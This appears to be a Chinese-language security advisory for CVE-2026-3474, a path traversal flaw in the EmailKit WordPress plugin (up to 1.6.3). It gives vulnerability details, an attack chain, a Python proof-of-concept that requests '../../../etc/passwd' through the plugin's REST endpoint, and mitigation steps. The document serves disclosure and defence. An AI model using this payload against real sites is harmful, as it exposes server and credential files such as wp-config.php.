CVE-2026-3474 CVSS 4.9 中危

CVE-2026-3474 EmailKit插件路径遍历致任意文件读取

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3474

漏洞类型

路径遍历

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

EmailKit – Email Customizer for WooCommerce & WP

漏洞概述

WordPress插件EmailKit在1.6.3及之前版本中存在路径遍历漏洞。由于TemplateData类的action()函数未对用户输入进行路径验证，攻击者可通过REST API参数利用file_get_contents()读取服务器任意文件（如wp-config.php）。此漏洞需管理员权限，可导致敏感信息泄露。

技术细节

该漏洞位于WordPress插件EmailKit的TemplateData类中。action()函数直接接收用户提供的'emailkit-editor-template'参数，并将其传递给file_get_contents()函数，未经过滤或路径限制。尽管插件中的CheckForm类使用了realpath()进行安全验证，但TemplateData端点缺乏此类保护。这使得拥有管理员权限的攻击者能够构造包含“../”序列的恶意路径，读取服务器上的任意敏感文件。文件内容被存储为post meta后，可通过fetch-data端点获取，造成了严重的信息泄露风险。

攻击链分析

STEP 1

1. 信息收集

识别目标站点是否安装了EmailKit插件，并确认版本是否在1.6.3及以下。

STEP 2

2. 获取权限

由于需要高权限，攻击者需通过钓鱼、暴力破解或其他手段获取WordPress管理员账户凭证。

STEP 3

3. 发起攻击

攻击者使用管理员权限向REST API端点发送特制请求，在'emailkit-editor-template'参数中注入路径遍历Payload（如../../../etc/passwd）。

STEP 4

4. 数据回传

服务器端执行file_get_contents()读取文件，并将内容存储。攻击者通过fetch-data接口或直接响应获取读取到的敏感文件内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Configuration
target_url = "http://target.com/wp-json/emailkit/v1/template-data" # Example endpoint
auth_cookie = "wordpress_logged_in_admin_cookie_value"

# Headers
headers = {
    "Cookie": f"wordpress_logged_in_xxx={auth_cookie}"
}

# Payload for Path Traversal
# Reading /etc/passwd
data = {
    "emailkit-editor-template": "../../../../../../../../etc/passwd"
}

try:
    # Send POST request to the vulnerable endpoint
    response = requests.post(target_url, headers=headers, data=data)

    if response.status_code == 200:
        print("[+] Exploit successful! Response content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

EmailKit <= 1.6.3

防御指南

临时缓解措施

若无法立即升级，应暂时禁用该插件或通过Web应用防火墙（WAF）拦截包含路径遍历字符（如../）的REST API请求。同时，严格加强对管理员账户的安全防护，防止凭证泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表